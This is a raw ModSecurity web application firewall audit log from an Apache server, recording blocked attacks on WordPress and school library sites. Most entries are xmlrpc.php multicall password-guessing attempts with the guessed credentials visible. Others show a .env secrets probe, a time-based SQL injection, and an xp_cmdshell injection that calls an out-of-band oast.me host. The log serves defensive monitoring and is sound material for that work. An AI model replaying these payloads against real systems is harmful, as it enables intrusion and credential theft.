--632b4d0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749129257782227 2849 (- - -) Stopwatch2: 1749129257782227 2849; combined=1300, p1=436, p2=834, p3=0, p4=0, p5=30, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --632b4d0a-Z-- --c56cb559-A-- [05/Jun/2025:20:29:26 +0700] aEGbtuth7G2xELALzPZfuAAAAMQ 103.236.140.4 34108 103.236.140.4 8181 --c56cb559-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c56cb559-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAjdoo2010! --c56cb559-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c56cb559-E-- --c56cb559-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.69.98.51 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749130166077864 5122 (- - -) Stopwatch2: 1749130166077864 5122; combined=3837, p1=455, p2=3220, p3=0, p4=0, p5=96, sr=84, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c56cb559-Z-- --249e5422-A-- [05/Jun/2025:20:34:52 +0700] aEGc_FwdJdhOudw5hdwArgAAAIQ 103.236.140.4 34178 103.236.140.4 8181 --249e5422-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --249e5422-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehBlaise@123# --249e5422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --249e5422-E-- --249e5422-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.69.98.51 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749130492981342 6265 (- - -) Stopwatch2: 1749130492981342 6265; combined=4368, p1=553, p2=3669, p3=0, p4=0, p5=87, sr=93, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --249e5422-Z-- --f24cf05e-A-- [05/Jun/2025:20:49:50 +0700] aEGgfuth7G2xELALzPZf4wAAAM4 103.236.140.4 34470 103.236.140.4 8181 --f24cf05e-B-- GET /.c9/metadata/environment/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:32.0) Gecko/20100101 Firefox/32.0 Accept-Charset: utf-8 --f24cf05e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f24cf05e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749131390680556 785 (- - -) Stopwatch2: 1749131390680556 785; combined=319, p1=280, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f24cf05e-Z-- --fbbcaa7d-A-- [05/Jun/2025:20:58:06 +0700] aEGibuth7G2xELALzPZgAQAAANA 103.236.140.4 34660 103.236.140.4 8181 --fbbcaa7d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 216.55.146.46 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 216.55.146.46 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fbbcaa7d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh.2022 --fbbcaa7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbbcaa7d-E-- --fbbcaa7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 216.55.146.46 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749131886086882 6680 (- - -) Stopwatch2: 1749131886086882 6680; combined=4554, p1=558, p2=3819, p3=0, p4=0, p5=108, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbbcaa7d-Z-- --0fa41816-A-- [05/Jun/2025:20:58:59 +0700] aEGio3-K7ToMdu-YSIJY6gAAAA8 103.236.140.4 34694 103.236.140.4 8181 --0fa41816-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0fa41816-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminrootantixroot --0fa41816-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fa41816-E-- --0fa41816-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749131939005627 4930 (- - -) Stopwatch2: 1749131939005627 4930; combined=3669, p1=406, p2=3094, p3=0, p4=0, p5=100, sr=73, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fa41816-Z-- --3b771201-A-- [05/Jun/2025:21:00:06 +0700] aEGi5irHpfaS2Cuwh8UMOwAAAEI 103.236.140.4 34714 103.236.140.4 8181 --3b771201-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 143.244.185.159 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 143.244.185.159 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3b771201-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh#789 --3b771201-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b771201-E-- --3b771201-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 143.244.185.159 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132006504163 6412 (- - -) Stopwatch2: 1749132006504163 6412; combined=4563, p1=548, p2=3783, p3=0, p4=0, p5=133, sr=91, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b771201-Z-- --e4f4d835-A-- [05/Jun/2025:21:00:24 +0700] aEGi-H-K7ToMdu-YSIJY8wAAAAQ 103.236.140.4 34718 103.236.140.4 8181 --e4f4d835-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e4f4d835-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix#1 --e4f4d835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4f4d835-E-- --e4f4d835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132024085295 6451 (- - -) Stopwatch2: 1749132024085295 6451; combined=4482, p1=546, p2=3761, p3=0, p4=0, p5=104, sr=95, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4f4d835-Z-- --84ab7c3a-A-- [05/Jun/2025:21:03:49 +0700] aEGjxX-K7ToMdu-YSIJZAAAAABY 103.236.140.4 34804 103.236.140.4 8181 --84ab7c3a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 41.70.100.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 41.70.100.6 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --84ab7c3a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin01* --84ab7c3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84ab7c3a-E-- --84ab7c3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 41.70.100.6 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132229745389 6440 (- - -) Stopwatch2: 1749132229745389 6440; combined=4500, p1=554, p2=3775, p3=0, p4=0, p5=102, sr=95, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84ab7c3a-Z-- --fe531a1e-A-- [05/Jun/2025:21:08:22 +0700] aEGk1irHpfaS2Cuwh8UMTwAAAE0 103.236.140.4 34860 103.236.140.4 8181 --fe531a1e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fe531a1e-C-- system.multicallmethodNamewp.getUsersBlogsparamscargo2023Cargo2023 --fe531a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe531a1e-E-- --fe531a1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132502880919 4762 (- - -) Stopwatch2: 1749132502880919 4762; combined=3819, p1=402, p2=3044, p3=0, p4=0, p5=203, sr=80, sw=170, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe531a1e-Z-- --c024a839-A-- [05/Jun/2025:21:15:08 +0700] aEGmbOth7G2xELALzPZgGQAAAM4 103.236.140.4 34928 103.236.140.4 8181 --c024a839-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c024a839-C-- system.multicallmethodNamewp.getUsersBlogsparamsdextraDextra2019! --c024a839-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c024a839-E-- --c024a839-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132908929905 5481 (- - -) Stopwatch2: 1749132908929905 5481; combined=4025, p1=490, p2=3362, p3=0, p4=0, p5=102, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c024a839-Z-- --03109f68-A-- [05/Jun/2025:21:17:27 +0700] aEGm91wdJdhOudw5hdwBRwAAAIE 103.236.140.4 36082 103.236.140.4 8181 --03109f68-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 84 User-Agent: WMS/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173686579 --03109f68-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --03109f68-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03109f68-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749133047070655 2585 (- - -) Stopwatch2: 1749133047070655 2585; combined=1435, p1=368, p2=1035, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03109f68-Z-- --6dc76c45-A-- [05/Jun/2025:21:17:27 +0700] aEGm9-th7G2xELALzPZgVQAAAMo 103.236.140.4 36090 103.236.140.4 8181 --6dc76c45-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 773 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173234464 --6dc76c45-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0us2vpgpeonc6qdbef038y3e4qt1hqif.oast.me'-- --6dc76c45-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dc76c45-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749133047076720 3522 (- - -) Stopwatch2: 1749133047076720 3522; combined=2234, p1=485, p2=1678, p3=21, p4=24, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dc76c45-Z-- --9bc1541d-A-- [05/Jun/2025:21:17:57 +0700] aEGnFeth7G2xELALzPZgbgAAAME 103.236.140.4 36468 103.236.140.4 8181 --9bc1541d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9bc1541d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix1. --9bc1541d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bc1541d-E-- --9bc1541d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749133077681186 4387 (- - -) Stopwatch2: 1749133077681186 4387; combined=3452, p1=379, p2=2890, p3=0, p4=0, p5=105, sr=77, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bc1541d-Z-- --372c241f-A-- [05/Jun/2025:21:24:56 +0700] aEGouH-K7ToMdu-YSIJZxAAAAAI 103.236.140.4 36594 103.236.140.4 8181 --372c241f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --372c241f-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdminantix01 --372c241f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --372c241f-E-- --372c241f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749133496257317 5647 (- - -) Stopwatch2: 1749133496257317 5647; combined=4089, p1=476, p2=3438, p3=0, p4=0, p5=103, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --372c241f-Z-- --11191e2e-A-- [05/Jun/2025:21:31:37 +0700] aEGqSVwdJdhOudw5hdwBegAAAIU 103.236.140.4 36682 103.236.140.4 8181 --11191e2e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --11191e2e-C-- system.multicallmethodNamewp.getUsersBlogsparamssolankaSolanka321! --11191e2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11191e2e-E-- --11191e2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749133897535876 5097 (- - -) Stopwatch2: 1749133897535876 5097; combined=3865, p1=457, p2=3239, p3=0, p4=0, p5=99, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11191e2e-Z-- --bb3b6f6c-A-- [05/Jun/2025:21:36:09 +0700] aEGrWX-K7ToMdu-YSIJZ0AAAAAs 103.236.140.4 36750 103.236.140.4 8181 --bb3b6f6c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.200.240.65 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.200.240.65 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bb3b6f6c-C-- system.multicallmethodNamewp.getUsersBlogsparamstest-de-1test --bb3b6f6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb3b6f6c-E-- --bb3b6f6c-H-- Message: Access denied with code 403 (phase 2). Operator 